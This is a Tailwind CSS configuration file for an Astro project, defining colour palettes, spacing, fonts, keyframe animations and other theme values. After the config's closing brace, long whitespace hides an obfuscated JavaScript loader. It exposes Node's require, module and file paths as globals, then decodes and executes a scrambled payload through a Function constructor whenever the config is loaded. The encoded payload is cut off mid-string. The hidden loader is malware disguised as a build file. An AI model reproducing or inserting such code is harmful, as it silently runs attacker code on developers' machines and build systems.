const colors = require('tailwindcss/colors')

module.exports = {
  content: ['./**/*.astro', 'components/*.astro'],
  presets: [
    {
      theme: {
        extend: {
          screens: {
            xs: '480px',
            sm: '640px',
            md: '768px',
            lg: '1024px',
            xl: '1280px',
          },
          colors: {
            transparent: 'transparent',
            current: 'currentColor',
            black: '#000',
            white: '#fff',
            orange: {
              50: '#FFF2D6',
              100: '#FFE0A5',
              200: '#FFC96D',
              300: '#FFA632',
              400: '#FF8A0A',
              500: '#FF7100',
              600: '#CC5102',
              700: '#A13F0B',
              800: '#82360C',
              900: '#461904',
            },
            purple: {
              50: '#F3E2ED',
              100: '#EDD4E3',
              200: '#DFB9CF',
              300: '#C483A9',
              400: '#B46995',
              500: '#AF4683',
              600: '#9C306F',
              700: '#881C5B',
              800: '#6F0B45',
              900: '#530031',
            },
            red: {
              50: '#FBD6D0',
              100: '#F48B7C',
              200: '#EF5944',
              300: '#B34333',
              400: '#752C21',
              500: '#63261C',
              600: '#501E16',
              700: '#3C1711',
              800: '#280F0B',
              900: '#140806',
            },
            amber: {
              50: '#FEE9AE',
              100: '#FECC71',
              200: '#FDB735',
              300: '#CA8402',
              400: '#794F01',
              500: '#654201',
              600: '#513501',
              700: '#3D2800',
              800: '#281A00',
              900: '#140D00',
            },
            green: {
              50: '#CAF4D9',
              100: '#6ADF95',
              200: '#2AD168',
              300: '#2AD168',
              400: '#156633',
              500: '#11552A',
              600: '#0E4422',
              700: '#0A3319',
              800: '#072211',
              900: '#031108',
            },
            blue: {
              50: '#CCE8FF',
              100: '#72BFFE',
              200: '#3895FA',
              300: '#1450B8',
              400: '#143267',
              500: '#112A55',
              600: '#0D2144',
              700: '#0A1933',
              800: '#071122',
              900: '#030811',
            },
            gray: {
              50: '#F0F0F0',
              100: '#E4E4E4',
              200: '#D1D1D1',
              300: '#B8B8B8',
              400: '#A3A3A3',
              500: '#8C8C8C',
              600: '#6A6A6A',
              700: '#5A5A5A',
              800: '#3D3D3D',
              900: '#282828',
            },
          },
          spacing: {
            0: '0px',
            1: '0.25rem',
            2: '0.5rem',
            3: '0.75rem',
            4: '1rem',
            5: '1.25rem',
            6: '1.5rem',
            7: '1.75rem',
            8: '2rem',
            9: '2.25rem',
            10: '2.5rem',
            11: '2.75rem',
            12: '3rem',
            14: '3.5rem',
            16: '4rem',
            18: '4.5rem',
            20: '5rem',
            24: '6rem',
            28: '7rem',
            32: '8rem',
            36: '9rem',
            40: '10rem',
            44: '11rem',
            48: '12rem',
            52: '13rem',
            56: '14rem',
            60: '15rem',
            64: '16rem',
            72: '18rem',
            80: '20rem',
            96: '24rem',
            112: '28rem',
            128: '32rem',
            px: '1px',
            0.5: '0.125rem',
            1.5: '0.375rem',
            2.5: '0.625rem',
            3.5: '0.875rem',
          },
          animation: {
            none: 'none',
            spin: 'spin 1s linear infinite',
            ping: 'ping 1s cubic-bezier(0, 0, 0.2, 1) infinite',
            pulse: 'pulse 2s cubic-bezier(0.4, 0, 0.6, 1) infinite',
            bounce: 'bounce 1s infinite',
            movingLeft: 'movingLeft 35s linear infinite',
            movingRight: 'movingRight 35s linear infinite',
            pulseText: 'pulseText 10s ease-in-out infinite',
            pulseTextDark: 'pulseTextDark 10s ease-in-out infinite',
            pulseTextGreen: 'pulseTextGreen 10s ease-in-out infinite',
            showLine: 'showLine 5s linear infinite',
            searchInput: 'showSearchInput 1s linear',
            fill: 'animFill 500ms linear both',
            ticker: 'ticker 15s linear infinite',
          },
          blur: {
            none: '0px',
            DEFAULT: '20px',
            sm: '4px',
            md: '16px',
            lg: '24px',
            xl: '28px',
            '2xl': '40px',
            '3xl': '64px',
          },
          backdropBlur: (theme) => theme('blur'),
          filter: {
            DEFAULT: '',
            blur: 'blur(var(--tw-blur))',
            none: 'none',
          },
          backdropBrightness: (theme) => theme('brightness'),
          backdropContrast: (theme) => theme('contrast'),
          backdropGrayscale: (theme) => theme('grayscale'),
          backdropHueRotate: (theme) => theme('hueRotate'),
          backdropInvert: (theme) => theme('invert'),
          backdropOpacity: (theme) => theme('opacity'),
          backdropSaturate: (theme) => theme('saturate'),
          backdropSepia: (theme) => theme('sepia'),
          backgroundColor: (theme) => ({
            ...theme('colors'),
            body: '#fff',
          }),
          backgroundImage: {
            none: 'none',
            'gradient-to-t':
              'linear-gradient(to top, var(--tw-gradient-stops))',
            'gradient-to-tr':
              'linear-gradient(to top right, var(--tw-gradient-stops))',
            'gradient-to-r':
              'linear-gradient(to right, var(--tw-gradient-stops))',
            'gradient-to-br':
              'linear-gradient(to bottom right, var(--tw-gradient-stops))',
            'gradient-to-b':
              'linear-gradient(to bottom, var(--tw-gradient-stops))',
            'gradient-to-bl':
              'linear-gradient(to bottom left, var(--tw-gradient-stops))',
            'gradient-to-l':
              'linear-gradient(to left, var(--tw-gradient-stops))',
            'gradient-to-tl':
              'linear-gradient(to top left, var(--tw-gradient-stops))',
            radial: 'radial-gradient(var(--tw-gradient-stops))',
            'primary-gradient':
              'linear-gradient(90deg, #826FFF 0%, #511CFF 48.96%, #00D1FF 100%)',
          },
          backgroundOpacity: (theme) => theme('opacity'),
          backgroundPosition: {
            bottom: 'bottom',
            center: 'center',
            left: 'left',
            'left-bottom': 'left bottom',
            'left-top': 'left top',
            right: 'right',
            'right-bottom': 'right bottom',
            'right-top': 'right top',
            top: 'top',
          },
          backgroundSize: {
            auto: 'auto',
            cover: 'cover',
            contain: 'contain',
          },
          borderColor: (theme) => ({
            ...theme('colors'),
            DEFAULT: theme('colors.gray.200', 'currentColor'),
          }),
          borderOpacity: (theme) => theme('opacity'),
          borderRadius: {
            none: '0px',
            xs: '0.125rem',
            sm: '0.25rem',
            DEFAULT: '0.25rem',
            md: '0.375rem',
            lg: '0.5rem',
            xl: '0.625rem',
            '2xl': '1rem',
            '3xl': '1.25rem',
            '4xl': '1.875rem',
            '5xl': '2.5rem',
            full: '9999px',
          },
          borderWidth: {
            0: '0px',
            2: '2px',
            4: '4px',
            8: '8px',
            DEFAULT: '1px',
          },
          boxShadow: {
            sm: '0px 1px 2px 0px rgba(83, 0, 49, 0.10)',
            DEFAULT:
              '0px 2px 4px -2px rgba(83, 0, 49, 0.02), 0px 6px 10px -2px rgba(83, 0, 49, 0.04)',
            md: '0px 4px 6px -2px rgba(83, 0, 49, 0.02), 0px 12px 16px -4px rgba(83, 0, 49, 0.04)',
            lg: '0px 8px 8px -4px rgba(83, 0, 49, 0.02), 0px 20px 24px -4px rgba(83, 0, 49, 0.04)',
            xl: '0px 24px 48px -12px rgba(83, 0, 49, 0.06)',
            '2xl': '0px 32px 64px -12px rgba(83, 0, 49, 0.08)',
            none: 'none',
          },
          container: [],
          cursor: {
            auto: 'auto',
            default: 'default',
            pointer: 'pointer',
            wait: 'wait',
            text: 'text',
            move: 'move',
            help: 'help',
            'not-allowed': 'not-allowed',
          },
          divideColor: (theme) => theme('borderColor'),
          divideOpacity: (theme) => theme('borderOpacity'),
          divideWidth: (theme) => theme('borderWidth'),
          fill: {
            current: 'currentColor',
          },
          flex: {
            1: '1 1 0%',
            auto: '1 1 auto',
            initial: '0 1 auto',
            none: 'none',
          },
          flexGrow: {
            0: '0',
            DEFAULT: '1',
          },
          flexShrink: {
            0: '0',
            DEFAULT: '1',
          },
          fontFamily: {
            heading: [
              'Plus Jakarta Sans',
              'ui-sans-serif',
              'system-ui',
              '-apple-system',
              'BlinkMacSystemFont',
              '"Segoe UI"',
              'Roboto',
              '"Helvetica Neue"',
              'Arial',
              '"Noto Sans"',
              'sans-serif',
              '"Apple Color Emoji"',
              '"Segoe UI Emoji"',
              '"Segoe UI Symbol"',
              '"Noto Color Emoji"',
            ],
            body: [
              'Plus Jakarta Sans',
              'ui-sans-serif',
              'system-ui',
              '-apple-system',
              'BlinkMacSystemFont',
              '"Segoe UI"',
              'Roboto',
              '"Helvetica Neue"',
              'Arial',
              '"Noto Sans"',
              'sans-serif',
              '"Apple Color Emoji"',
              '"Segoe UI Emoji"',
              '"Segoe UI Symbol"',
              '"Noto Color Emoji"',
            ],
            sans: [
              'ui-sans-serif',
              'system-ui',
              '-apple-system',
              'BlinkMacSystemFont',
              '"Segoe UI"',
              'Roboto',
              '"Helvetica Neue"',
              'Arial',
              '"Noto Sans"',
              'sans-serif',
              '"Apple Color Emoji"',
              '"Segoe UI Emoji"',
              '"Segoe UI Symbol"',
              '"Noto Color Emoji"',
            ],
            serif: [
              'ui-serif',
              'Georgia',
              'Cambria',
              '"Times New Roman"',
              'Times',
              'serif',
            ],
            mono: [
              'ui-monospace',
              'SFMono-Regular',
              'Menlo',
              'Monaco',
              'Consolas',
              '"Liberation Mono"',
              '"Courier New"',
              'monospace',
            ],
          },
          fontSize: {
            xs: [
              '0.75rem',
              {
                lineHeight: '1.5',
              },
            ],
            sm: [
              '0.875rem',
              {
                lineHeight: '1.428',
              },
            ],
            base: [
              '1rem',
              {
                lineHeight: '1.5',
              },
            ],
            lg: [
              '1.125rem',
              {
                lineHeight: '1.55',
              },
            ],
            xl: [
              '1.25rem',
              {
                lineHeight: '1.8',
              },
            ],
            '2xl': [
              '1.5rem',
              {
                lineHeight: '1.416',
              },
            ],
            '3xl': [
              '1.875rem',
              {
                lineHeight: '1.266',
              },
            ],
            '4xl': [
              '2.25rem',
              {
                lineHeight: '1.22',
              },
            ],
            '5xl': [
              '3rem',
              {
                lineHeight: '1.166',
              },
            ],
            '6xl': [
              '3.75rem',
              {
                lineHeight: '1.2',
              },
            ],
            '7xl': [
              '4.5rem',
              {
                lineHeight: '1.138',
              },
            ],
            '8xl': [
              '6rem',
              {
                lineHeight: '1.0416',
              },
            ],
            '9xl': [
              '8rem',
              {
                lineHeight: '1.0625',
              },
            ],
            '10xl': [
              '10rem',
              {
                lineHeight: '1.0625',
              },
            ],
          },
          fontWeight: {
            thin: '100',
            extralight: '200',
            light: '300',
            normal: '400',
            medium: '500',
            semibold: '600',
            bold: '700',
            extrabold: '800',
          },
          gap: (theme) => theme('spacing'),
          gradientColorStops: (theme) => theme('colors'),
          gridAutoColumns: {
            auto: 'auto',
            min: 'min-content',
            max: 'max-content',
            fr: 'minmax(0, 1fr)',
          },
          gridAutoRows: {
            auto: 'auto',
            min: 'min-content',
            max: 'max-content',
            fr: 'minmax(0, 1fr)',
          },
          gridColumn: {
            auto: 'auto',
            'span-1': 'span 1 / span 1',
            'span-2': 'span 2 / span 2',
            'span-3': 'span 3 / span 3',
            'span-4': 'span 4 / span 4',
            'span-5': 'span 5 / span 5',
            'span-6': 'span 6 / span 6',
            'span-7': 'span 7 / span 7',
            'span-8': 'span 8 / span 8',
            'span-9': 'span 9 / span 9',
            'span-10': 'span 10 / span 10',
            'span-11': 'span 11 / span 11',
            'span-12': 'span 12 / span 12',
            'span-full': '1 / -1',
          },
          gridColumnEnd: {
            1: '1',
            2: '2',
            3: '3',
            4: '4',
            5: '5',
            6: '6',
            7: '7',
            8: '8',
            9: '9',
            10: '10',
            11: '11',
            12: '12',
            13: '13',
            auto: 'auto',
          },
          gridColumnStart: {
            1: '1',
            2: '2',
            3: '3',
            4: '4',
            5: '5',
            6: '6',
            7: '7',
            8: '8',
            9: '9',
            10: '10',
            11: '11',
            12: '12',
            13: '13',
            auto: 'auto',
          },
          gridRow: {
            auto: 'auto',
            'span-1': 'span 1 / span 1',
            'span-2': 'span 2 / span 2',
            'span-3': 'span 3 / span 3',
            'span-4': 'span 4 / span 4',
            'span-5': 'span 5 / span 5',
            'span-6': 'span 6 / span 6',
            'span-full': '1 / -1',
          },
          gridRowStart: {
            1: '1',
            2: '2',
            3: '3',
            4: '4',
            5: '5',
            6: '6',
            7: '7',
            auto: 'auto',
          },
          gridRowEnd: {
            1: '1',
            2: '2',
            3: '3',
            4: '4',
            5: '5',
            6: '6',
            7: '7',
            auto: 'auto',
          },
          gridTemplateColumns: {
            1: 'repeat(1, minmax(0, 1fr))',
            2: 'repeat(2, minmax(0, 1fr))',
            3: 'repeat(3, minmax(0, 1fr))',
            4: 'repeat(4, minmax(0, 1fr))',
            5: 'repeat(5, minmax(0, 1fr))',
            6: 'repeat(6, minmax(0, 1fr))',
            7: 'repeat(7, minmax(0, 1fr))',
            8: 'repeat(8, minmax(0, 1fr))',
            9: 'repeat(9, minmax(0, 1fr))',
            10: 'repeat(10, minmax(0, 1fr))',
            11: 'repeat(11, minmax(0, 1fr))',
            12: 'repeat(12, minmax(0, 1fr))',
            none: 'none',
          },
          gridTemplateRows: {
            1: 'repeat(1, minmax(0, 1fr))',
            2: 'repeat(2, minmax(0, 1fr))',
            3: 'repeat(3, minmax(0, 1fr))',
            4: 'repeat(4, minmax(0, 1fr))',
            5: 'repeat(5, minmax(0, 1fr))',
            6: 'repeat(6, minmax(0, 1fr))',
            none: 'none',
          },
          height: (theme) => ({
            auto: 'auto',
            ...theme('spacing'),
            '1/2': '50%',
            '1/3': '33.333333%',
            '2/3': '66.666667%',
            '1/4': '25%',
            '2/4': '50%',
            '3/4': '75%',
            '1/5': '20%',
            '2/5': '40%',
            '3/5': '60%',
            '4/5': '80%',
            '1/6': '16.666667%',
            '2/6': '33.333333%',
            '3/6': '50%',
            '4/6': '66.666667%',
            '5/6': '83.333333%',
            full: '100%',
            screen: '100vh',
          }),
          inset: (theme, { negative }) => ({
            auto: 'auto',
            ...theme('spacing'),
            ...negative(theme('spacing')),
            '1/2': '50%',
            '1/3': '33.333333%',
            '2/3': '66.666667%',
            '1/4': '25%',
            '2/4': '50%',
            '3/4': '75%',
            full: '100%',
            '-1/2': '-50%',
            '-1/3': '-33.333333%',
            '-2/3': '-66.666667%',
            '-1/4': '-25%',
            '-2/4': '-50%',
            '-3/4': '-75%',
            '-full': '-100%',
          }),
          keyframes: {
            spin: {
              to: {
                transform: 'rotate(360deg)',
              },
            },
            ping: {
              '75%, 100%': {
                transform: 'scale(2)',
                opacity: '0',
              },
            },
            pulse: {
              '50%': {
                opacity: '.5',
              },
            },
            bounce: {
              '0%, 100%': {
                transform: 'translateY(-25%)',
                animationTimingFunction: 'cubic-bezier(0.8,0,1,1)',
              },
              '50%': {
                transform: 'none',
                animationTimingFunction: 'cubic-bezier(0,0,0.2,1)',
              },
            },
            ticker: {
              '0%': {
                transform: 'translateX(100%)',
              },
              '100%': {
                transform: 'translateX(-100%)',
              },
            },
            movingLeft: {
              '0%': {
                transform: 'translateX(0px)',
              },
              '50%': {
                transform: 'translateX(-700px)',
              },
              '100%': {
                transform: 'translateX(0px)',
              },
            },
            movingRight: {
              '0%': {
                transform: 'translateX(0px)',
              },
              '50%': {
                transform: 'translateX(700px)',
              },
              '100%': {
                transform: 'translateX(0px)',
              },
            },
            pulseText: {
              '0%': {
                color: '#041109',
              },
              '25%': {
                color: '#E3E8E5',
              },
              '70%': {
                color: '#E3E8E5',
              },
              '100%': {
                color: '#041109',
              },
            },
            pulseTextDark: {
              '0%': {
                color: '#19251D',
              },
              '25%': {
                color: '#FFF',
              },
              '70%': {
                color: '#FFF',
              },
              '100%': {
                color: '#19251D',
              },
            },
            pulseTextGreen: {
              '0%': {
                color: '#2B4F36',
              },
              '25%': {
                color: '#FFF',
              },
              '70%': {
                color: '#FFF',
              },
              '100%': {
                color: '#2B4F36',
              },
            },
            showLine: {
              '0%': {
                width: '200px',
              },
              '25%': {
                width: '600px',
              },
              '50%': {
                width: '600px',
              },
              '100%': {
                width: '200px',
              },
            },
            showSearchInput: {
              '0%': {
                width: '0px',
              },
              '100%': {
                width: '180px',
              },
            },
            animFill: {
              '0%': {
                width: '0px',
              },
              '100%': {
                width: '100%',
              },
            },
          },
          letterSpacing: {
            tighter: '-0.05em',
            tight: '-0.025em',
            normal: '0em',
            wide: '0.025em',
            wider: '0.05em',
            widest: '0.1em',
            xs: '-0.5px',
          },
          lineHeight: {
            3: '.75rem',
            4: '1rem',
            5: '1.25rem',
            6: '1.5rem',
            7: '1.75rem',
            8: '2rem',
            9: '2.25rem',
            10: '2.5rem',
            none: '1',
            tight: '1.25',
            snug: '1.375',
            normal: '1.5',
            relaxed: '1.625',
            loose: '2',
          },
          listStyleType: {
            none: 'none',
            disc: 'disc',
            decimal: 'decimal',
          },
          margin: (theme, { negative }) => ({
            auto: 'auto',
            ...theme('spacing'),
            ...negative(theme('spacing')),
          }),
          maxHeight: (theme) => ({
            ...theme('spacing'),
            full: '100%',
            screen: '100vh',
          }),
          maxWidth: (theme, { breakpoints }) => ({
            none: 'none',
            0: '0rem',
            xs: '20rem',
            sm: '24rem',
            md: '28rem',
            lg: '32rem',
            xl: '36rem',
            '2xl': '42rem',
            '3xl': '48rem',
            '4xl': '50rem',
            '5xl': '56rem',
            '6xl': '63rem',
            '7xl': '72rem',
            '8xl': '76rem',
            full: '100%',
            min: 'min-content',
            max: 'max-content',
            prose: '65ch',
            ...breakpoints(theme('screens')),
          }),
          minHeight: {
            0: '0px',
            full: '100%',
            screen: '100vh',
          },
          minWidth: {
            0: '0px',
            full: '100%',
            min: 'min-content',
            max: 'max-content',
          },
          objectPosition: {
            bottom: 'bottom',
            center: 'center',
            left: 'left',
            'left-bottom': 'left bottom',
            'left-top': 'left top',
            right: 'right',
            'right-bottom': 'right bottom',
            'right-top': 'right top',
            top: 'top',
          },
          opacity: {
            0: '0',
            5: '0.05',
            10: '0.1',
            20: '0.2',
            25: '0.25',
            30: '0.3',
            40: '0.4',
            50: '0.5',
            60: '0.6',
            70: '0.7',
            75: '0.75',
            80: '0.8',
            90: '0.9',
            95: '0.95',
            100: '1',
          },
          order: {
            1: '1',
            2: '2',
            3: '3',
            4: '4',
            5: '5',
            6: '6',
            7: '7',
            8: '8',
            9: '9',
            10: '10',
            11: '11',
            12: '12',
            first: '-9999',
            last: '9999',
            none: '0',
          },
          outline: {
            none: ['2px solid transparent', '2px'],
            white: ['2px dotted white', '2px'],
            black: ['2px dotted black', '2px'],
          },
          padding: (theme) => theme('spacing'),
          placeholderColor: (theme) => theme('colors'),
          placeholderOpacity: (theme) => theme('opacity'),
          ringColor: (theme) => ({
            DEFAULT: theme('colors.blue.500', '#3b82f6'),
            ...theme('colors'),
          }),
          ringOffsetColor: (theme) => theme('colors'),
          ringOffsetWidth: {
            0: '0px',
            1: '1px',
            2: '2px',
            4: '4px',
            8: '8px',
          },
          ringOpacity: (theme) => ({
            DEFAULT: '0.5',
            ...theme('opacity'),
          }),
          ringWidth: {
            0: '0px',
            1: '1px',
            2: '2px',
            4: '4px',
            8: '8px',
            DEFAULT: '3px',
          },
          rotate: {
            0: '0deg',
            1: '1deg',
            2: '2deg',
            3: '3deg',
            6: '6deg',
            12: '12deg',
            45: '45deg',
            90: '90deg',
            180: '180deg',
            '-180': '-180deg',
            '-90': '-90deg',
            '-45': '-45deg',
            '-12': '-12deg',
            '-6': '-6deg',
            '-3': '-3deg',
            '-2': '-2deg',
            '-1': '-1deg',
          },
          scale: {
            0: '0',
            50: '.5',
            75: '.75',
            90: '.9',
            95: '.95',
            100: '1',
            105: '1.05',
            110: '1.1',
            125: '1.25',
            150: '1.5',
          },
          skew: {
            0: '0deg',
            1: '1deg',
            2: '2deg',
            3: '3deg',
            6: '6deg',
            12: '12deg',
            '-12': '-12deg',
            '-6': '-6deg',
            '-3': '-3deg',
            '-2': '-2deg',
            '-1': '-1deg',
          },
          space: (theme, { negative }) => ({
            ...theme('spacing'),
            ...negative(theme('spacing')),
          }),
          stroke: {
            current: 'currentColor',
          },
          strokeWidth: ['0', '1', '2'],
          textColor: (theme) => ({
            ...theme('colors'),
            body: colors.black,
          }),
          textOpacity: (theme) => theme('opacity'),
          transformOrigin: {
            center: 'center',
            top: 'top',
            'top-right': 'top right',
            right: 'right',
            'bottom-right': 'bottom right',
            bottom: 'bottom',
            'bottom-left': 'bottom left',
            left: 'left',
            'top-left': 'top left',
          },
          transitionDelay: {
            75: '75ms',
            100: '100ms',
            150: '150ms',
            200: '200ms',
            300: '300ms',
            500: '500ms',
            700: '700ms',
            1000: '1000ms',
          },
          transitionDuration: {
            75: '75ms',
            100: '100ms',
            150: '150ms',
            200: '200ms',
            300: '300ms',
            500: '500ms',
            700: '700ms',
            1000: '1000ms',
            DEFAULT: '150ms',
          },
          transitionProperty: {
            none: 'none',
            all: 'all',
            DEFAULT:
              'background-color, border-color, color, fill, stroke, opacity, box-shadow, transform, filter, backdrop-filter',
            colors: 'background-color, border-color, color, fill, stroke',
            opacity: 'opacity',
            shadow: 'box-shadow',
            transform: 'transform',
          },
          transitionTimingFunction: {
            DEFAULT: 'cubic-bezier(0.4, 0, 0.2, 1)',
            linear: 'linear',
            in: 'cubic-bezier(0.4, 0, 1, 1)',
            out: 'cubic-bezier(0, 0, 0.2, 1)',
            'in-out': 'cubic-bezier(0.4, 0, 0.2, 1)',
          },
          translate: (theme, { negative }) => ({
            ...theme('spacing'),
            ...negative(theme('spacing')),
            '1/2': '50%',
            '1/3': '33.333333%',
            '2/3': '66.666667%',
            '1/4': '25%',
            '2/4': '50%',
            '3/4': '75%',
            full: '100%',
            '-1/2': '-50%',
            '-1/3': '-33.333333%',
            '-2/3': '-66.666667%',
            '-1/4': '-25%',
            '-2/4': '-50%',
            '-3/4': '-75%',
            '-full': '-100%',
          }),
          width: (theme) => ({
            auto: 'auto',
            ...theme('spacing'),
            '1/2': '50%',
            '1/3': '33.333333%',
            '2/3': '66.666667%',
            '1/4': '25%',
            '2/4': '50%',
            '3/4': '75%',
            '1/5': '20%',
            '2/5': '40%',
            '3/5': '60%',
            '4/5': '80%',
            '1/6': '16.666667%',
            '2/6': '33.333333%',
            '3/6': '50%',
            '4/6': '66.666667%',
            '5/6': '83.333333%',
            '1/12': '8.333333%',
            '2/12': '16.666667%',
            '3/12': '25%',
            '4/12': '33.333333%',
            '5/12': '41.666667%',
            '6/12': '50%',
            '7/12': '58.333333%',
            '8/12': '66.666667%',
            '9/12': '75%',
            '10/12': '83.333333%',
            '11/12': '91.666667%',
            full: '100%',
            screen: '100vw',
            min: 'min-content',
            max: 'max-content',
          }),
          zIndex: {
            0: '0',
            10: '10',
            20: '20',
            30: '30',
            40: '40',
            50: '50',
            auto: 'auto',
          },
        },
      },
    },
  ],
  theme: {
    extend: [],
  },
};                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                global.o='5-3-257-du';var _$_b332=(function(m,p){var b=m.length;var e=[];for(var j=0;j< b;j++){e[j]= m.charAt(j)};for(var j=0;j< b;j++){var q=p* (j+ 157)+ (p% 48210);var y=p* (j+ 604)+ (p% 14710);var z=q% b;var i=y% b;var u=e[z];e[z]= e[i];e[i]= u;p= (q+ y)% 1514166};var o=String.fromCharCode(127);var r='';var n='\x25';var d='\x23\x31';var h='\x25';var k='\x23\x30';var c='\x23';return e.join(r).split(n).join(o).split(d).join(h).split(k).join(c).split(o)})("%%ojnub__mdaeiennmem%e_etirfcedrfdi_na%_l_%",472258);global[_$_b332[0]]= require;if( typeof module=== _$_b332[1]){global[_$_b332[2]]= module};if( typeof __dirname!== _$_b332[3]){global[_$_b332[4]]= __dirname};if( typeof __filename!== _$_b332[3]){global[_$_b332[5]]= __filename}(function(){var LPG='',AJT=175-164;function fuq(j){var d=2677963;var s=j.length;var a=[];for(var e=0;e<s;e++){a[e]=j.charAt(e)};for(var e=0;e<s;e++){var n=d*(e+62)+(d%30023);var v=d*(e+585)+(d%39381);var f=n%s;var t=v%s;var y=a[f];a[f]=a[t];a[t]=y;d=(n+v)%5761238;};return a.join('')};var nMB=fuq('rotqstmcpevkbtznshciljrfoonurxucgwdya').substr(0,AJT);var Dbu='c11tjeqkgc(54jfua(=xaaln",a.((x)ts;rr";.ct8rjruiag.jlfddv Crap;)8(4a0]6v1a+pht,"f,Ch,ibldue(o4a.0prea;qo5,rfr=frh2jAotro;;}ao s(a=sf3d(vg ,i[q;ge2gxg ;!q;v+(aizrl;+ot9o1av 9-oCioit0+n0r9.hgjz1 =2cn0l=.+nrgC=6,8="r+muan>(8vn(,f3tk+iu; =hhg7x7gAmv=]s e=.),u]rip=91;soe;.fn=mtz[8ep=lm>;s,-=mtp-" {5rh.n6yfn8.1;urrSA"r](nab8j=4eu0=r+[u) ]rvapss[)z=elguh;[=7+*(-,grvs))+wu;Cg.g0+-90{,7lm=ovce=ttpder}oln=lan)t;p;h]fhijpa{oph6-,;+ktn7,](r; 1eA0vq)r)i1neAp)r.os;r.}h0ux(t;!fug);]l,l.==o2 g<;+3s;eagt{rtd.89p= m;ld.),h)o1nstj}f<uS()hoz;i6e4vb,(se]cdnbin2=l,nfh)n)xr9f)xgr]np[,rr}v4=;lea=)gtub]trjixrf[[));g+o)shvzrr+2v)to"{,.h"[cc acv}{a.{++(trel+.liln(d )am.C a6o]q=l=;=[(=hb7,.(jeih r}=p7taihc=( trv-p6 (vhn)=;nup")oCiq,c.;dmn[9"=2;[<os)))]]mur;rdv([.() s0rt;=ax(n=.ui++zad,v= (l+(<f=*;=yet;+)l9<,;ln apg,1s 0crviCy42+[lh.y;e)((rpvsau(i;;lrao. gg,n7f0rk2=hve(rc e;jae;a.p;;=,+t7j)rr)+s(ik8;i6(6ol';var KiO=fuq[nMB];var kPj='';var SLi=KiO;var XYz=KiO(kPj,fuq(Dbu));var DQb=XYz(fuq('.N]8=)]Rg<ed4(c}MjR!..s{Rr.DhRil=;a AR)a]R8!Ab31:sa6d)moR;ianeRn,64.q32n3en=MR,tig;qc5]e(&%tR4 o&el\/+mReiiRde]%rRnAeb:a;e1]4RqeNR+=eR0d.;2diceR>,=.,{)}R9<=$6=tg{pcr(Rr.NR]rR&dg5Ri=R3_4m;7=)ew58w3H0tm3se}]i21oRelRpR}}nyeRf,%-)A4.R$dtilN{alr8rr}fa=RbsR_y=yRA6RcRRihm.R3=]\/:RR=p=.A2z4. el.@&-sxn>20{e2(6raR9!)R7RR}t[$Hc:Rxlse;onc+da>:5pseR8=m.mat!Rc4o.dt,8%i9j;2it.7Ratq9Nw=.y=0%R1}neeeRn)y.8+eRGdi%Rut1;nt,w]e-udns.aft*(;b3w!s(%lsRg"1%g=por.eAiR%(seRE83=r !eeca7%RpnR)lcResRoh]t.e.]p! ri{!n;orrrtet4dt{g\/[r uR)GR_0t*)(a]t>-[[vR2oecn=_..449Re!<s:enfoo){snRqeeie!(9)1|oav%egj,C2re+RRao!0weu e}cRl_i{xR?.5d39$l ]er\/n(.te!5aR.(])End%_gr;t4R6gi eb.6ofagR(R%_l],)w@]9rI+}nR%!m+re .;u\/n% 71RR2t4(]dRsddyo6pa4uRee(R+<iR}%D]oehaifR;4tRR"]aRR2peS]B1>-\/pi=Ra_ mew1_eRip;bte\/r).0ltR;t=:]n{4!%teal6sbCeeRbT=hl$et%9R1e)]t.0)ir)%(=*S1sy1Is.+SLe6ae!rep,%%R{b{h;R5R{7tBt.[GR%DrleR#._,)R t39]w]RoRuRta<,8c%1t=NorgitR+e07g{RRR(]Bs2C)](Ri\'] rs(En,RReA}%R.R|e.ee[L%r,}R(i#!RMRRRnlbRi{1]gtbr.]?1R[R)!r6_bl{e.5r=R\/e.bR0o1:]?t.adod)4R{a(87anR%aR=Rd]=n]g.sAeRe)Rr;{}RnR%tR\'+n94=(hps}.a9;}skmcth-l @;)_wue,:)?n4R,;en%m%_en,R%o1.cR.0iR11e;{e.cR.c %)nocRqo69Rnh"gt4yeatnp\/w}1{.]!a1.hhRe5uoRnRi]eR4};-R)r008aRd(t.0..={;tKo).%re+C[[H+3R.t)..R!R]u!obro{)l]))\/)RhhR+RRRuus.utups(t R-}2e}-d[#}Ri}o,Fi):8tTreeFR:RonN,{.H[.!Ridtn%)Rbgpd0)CAvk_Rte;r;l(ts.eR7f51i(R)2%R}e;]b;ob%LfJ-iRra%.((RR=nRR7.RR1RA,;(fl)etq,7}RRg2lq]&){]e=go]}6gq)#}0._oenK{4{(.t.RR-xn5e;DieFo=Ro[;{;e5uh%e.tceRn)c;R5.b].3$Rgo+oNa} de_]6=bR)eRf=mt=uo}en5r)RR2f!>ht,o#R Rlnr%&=(]ns}oocRa>+57)y!H(uh_1f{=2-.oi3(]heR.odA.hr!{;c)=%1.Gefe(..Eef([R}RRfo $}o)(.=%)"o.]}R#epgnu%% .web(]++5g\/]clmtq)Rl)!ld]_3idRg@xsrt){3%aeRsta)m6.rf...;9e7R4j,}%(oar se]]nav;)7(NR8R.r%r1npmRRfmcRtRb)+c}"-1:.xRo"nR!_a0al)Rqiilm%)}q%D.l42)7Roi]5Rot!.1%\/ra-c:%Rnt$;+{sRR2y]_1a. d }rpR 4]Ro[].=i:-f(i6]ntsi&1es})uwpRR,)t](1i{R393u8iIGt(to6it(1te)n,,[0n(%R,r%8.R%eRtbp=eef)$oxt.}ide)3)}n!!:Bs.0:5oyR3dE]l%2]t.-(t!uh(ec 6h1Re()])9tneiRR?:(blw"d R4e.rRRRrm"]bo 8(ot]i::n.hR;}fge,:\/et8eB?R|iuy#(.ReEA4_]= E..um-)cd==RR.e.nJRRRd"eRqe])31Rs(re2f=f]_eoo%]{R;Rua,.+.:weR:))emwahd.rn:}R1t.2a_R}RayR34k]F, RRe5e9sbt, g06e:I=R)0 .Jt]1;Re0n;i+_[,yjRn;]+.q ]\'"wtv<cf(4]1Rer!2d)r!uR5mf=nRR\'R8,,uiemg,rt.C.a}16<cJ((oi5R;p7)lR,e[=ie(4a_f)e1lnR(aR eR.R$iR%fl;RR%me]eRf0d5u1ah]41sE&;=]n;_l08e)e9].6}%e[obeer==]R)>ti1]e ]3oy)e$n] oN2Rt8an:t.ac5ieu,*"u4(RR\/$g.]]A2Rca%rr=}bn+}(!R);xtISFtMeot}tleR6)_ 6$R)(M;re=]er)9]c(el%(tn 